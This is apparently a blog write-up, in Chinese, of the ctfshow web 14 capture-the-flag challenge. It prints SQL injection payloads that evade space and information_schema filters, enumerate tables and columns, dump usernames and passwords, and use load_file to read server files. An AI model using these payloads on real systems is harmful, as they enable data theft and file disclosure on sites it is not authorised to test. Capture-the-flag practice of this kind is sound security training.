ctfshow web 14 sql注入

ctfshow web 14 sql注入

开始的页面是一段代码:
在这里插入图片描述
这是get传参,/?c=1 sleep一秒后输出$url
在这里插入图片描述
/?c=2也会输出@A@,有5555 4444 333但是不可能等这么久,直接输 /?c=3,出现
@A@here_1s_your_f1ag.php@A@
在这里插入图片描述
那打开这个文件,这是一个查询的页面
在这里插入图片描述
输入1回显是admin,url中可能存在sql注入
在这里插入图片描述
按F12查看源代码过滤了/information_schema.tables|information_schema.columns|linestring| |polygon/is
在这里插入图片描述
到这里大概率就是sql注入
爆库
在这里插入图片描述
这里差不了,我们把空格替换为/**/,数据库为web
在这里插入图片描述
爆表,这里information_schema.tables|information_schema有过滤,用tab键上的点绕过,?query=-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database()
在这里插入图片描述
爆字段?query=-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name="content"
在这里插入图片描述
爆值?query=-1/**/union/**/select/**/concat_ws(id,username,password)/**/from/**/content/**/where/**/id=1,很伤心,搞这么久还是没有flag
在这里插入图片描述之前查询时1时弹框admin,查询2时是gtd1y,现在我们把id改为2
在这里插入图片描述
id=3
在这里插入图片描述
这里说secret,我就想到一开始页面的代码,有一个include(secret.php)
?query=-1/**/union/**/select/**/load_file("/var/www/html/secret.php")没反应,我们按下F12查看
在这里插入图片描述
现在查看/real_flag_is_here
?query=-1/**/union/**/select/**/load_file("/real_flag_is_here")
在这里插入图片描述
flag{771ad34d-bc93-4f7f-8e53-acea29b2228f}

总结:
过滤了空格用/**/代替,把tables和columns用tab键上的点括起来
load_file函数读取文件内容

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值